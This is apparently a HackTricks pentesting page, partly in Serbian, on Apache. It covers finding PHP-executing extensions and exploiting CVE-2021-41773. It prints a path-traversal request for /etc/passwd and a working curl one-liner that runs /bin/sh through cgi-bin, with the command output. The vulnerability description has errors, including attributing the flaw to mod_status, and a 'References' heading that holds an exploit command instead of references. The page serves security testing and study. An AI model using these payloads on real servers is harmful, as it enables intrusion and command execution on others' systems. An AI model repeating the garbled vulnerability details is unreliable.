4.2 KiB
Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)!
Drugi načini podrške HackTricks-u:
- Ako želite da vidite vašu kompaniju reklamiranu na HackTricks-u ili preuzmete HackTricks u PDF formatu proverite PLANOVE ZA PRETPLATU!
- Nabavite zvanični PEASS & HackTricks swag
- Otkrijte The PEASS Family, našu kolekciju ekskluzivnih NFT-ova
- Pridružite se 💬 Discord grupi ili telegram grupi ili nas pratite na Twitter-u 🐦 @carlospolopm.
- Podelite svoje hakovanje trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.
Izvršivi PHP ekstenzije
Proverite koje ekstenzije izvršava Apache server. Da biste ih pretražili, možete izvršiti:
grep -R -B1 "httpd-php" /etc/apache2
Takođe, neka mesta gde možete pronaći ovu konfiguraciju su:
/etc/apache2/mods-available/php5.conf
/etc/apache2/mods-enabled/php5.conf
/etc/apache2/mods-available/php7.3.conf
/etc/apache2/mods-enabled/php7.3.conf
CVE-2021-41773
Description
Apache HTTP Server (httpd) is an open-source web server software. A vulnerability, known as CVE-2021-41773, has been discovered in Apache HTTP Server versions 2.4.49 and prior. This vulnerability allows remote attackers to execute arbitrary code and gain unauthorized access to the targeted system.
Exploitation
To exploit this vulnerability, an attacker can send a specially crafted HTTP request to the server, targeting the vulnerable mod_status module. By including a path traversal sequence in the request, the attacker can access files outside the web root directory.
The following request can be used to exploit the vulnerability:
GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1
Host: example.com
This request attempts to access the /etc/passwd file, which contains sensitive system information, such as user account details.
Mitigation
To mitigate this vulnerability, it is recommended to upgrade to Apache HTTP Server version 2.4.50 or later. Additionally, it is advised to restrict access to the mod_status module or disable it if not required.
References
curl http://172.18.0.15/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh --data 'echo Content-Type: text/plain; echo; id; uname'
uid=1(daemon) gid=1(daemon) groups=1(daemon)
Linux
Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)!
Drugi načini podrške HackTricks-u:
- Ako želite da vidite vašu kompaniju reklamiranu na HackTricks-u ili preuzmete HackTricks u PDF formatu proverite PLANOVE ZA PRETPLATU!
- Nabavite zvanični PEASS & HackTricks swag
- Otkrijte The PEASS Family, našu kolekciju ekskluzivnih NFT-ova
- Pridružite se 💬 Discord grupi ili telegram grupi ili nas pratite na Twitter-u 🐦 @carlospolopm.
- Podelite svoje hakovanje trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.